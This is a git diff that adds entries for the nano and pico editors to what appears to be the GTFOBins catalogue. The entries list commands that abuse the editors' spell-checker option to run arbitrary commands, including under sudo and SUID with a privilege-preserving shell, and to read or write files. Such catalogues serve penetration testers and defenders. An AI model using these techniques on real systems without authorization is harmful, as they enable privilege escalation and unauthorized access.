diff --git a/_gtfobins/nano.md b/_gtfobins/nano.md new file mode 100644 index 0000000..8bdc14c --- /dev/null +++ b/_gtfobins/nano.md @@ -0,0 +1,37 @@ +--- +functions: + execute-non-interactive: + - description: After running this exit the editor to see the command output. + code: | + COMMAND=id + TF=$(mktemp) + echo "$COMMAND" > $TF + chmod +x $TF + nano -s $TF + ^T + sudo-enabled: + - description: After running this exit the editor to see the command output. + code: | + COMMAND=id + TF=$(mktemp) + echo "$COMMAND" > $TF + chmod +x $TF + sudo nano -s $TF + ^T + suid-enabled: + - description: After running this exit the editor to see the command output. + code: |- + COMMAND=id + TF=$(mktemp) + echo $'#!/bin/sh -p\n'"$COMMAND" > $TF + chmod +x $TF + ./nano -s $TF + ^T + file-read: + - code: | + nano file_to_read + file-write: + - code: | + nano file_to_write + ^O +--- diff --git a/_gtfobins/pico.md b/_gtfobins/pico.md new file mode 100644 index 0000000..da9da1a --- /dev/null +++ b/_gtfobins/pico.md @@ -0,0 +1,37 @@ +--- +functions: + execute-non-interactive: + - description: After running this exit the editor to see the command output. + code: | + COMMAND=id + TF=$(mktemp) + echo "$COMMAND" > $TF + chmod +x $TF + pico -s $TF + ^T + sudo-enabled: + - description: After running this exit the editor to see the command output. + code: | + COMMAND=id + TF=$(mktemp) + echo "$COMMAND" > $TF + chmod +x $TF + sudo pico -s $TF + ^T + suid-enabled: + - description: After running this exit the editor to see the command output. + code: |- + COMMAND=id + TF=$(mktemp) + echo $'#!/bin/sh -p\n'"$COMMAND" > $TF + chmod +x $TF + ./pico -s $TF + ^T + file-read: + - code: | + pico file_to_read + file-write: + - code: | + pico file_to_write + ^O +---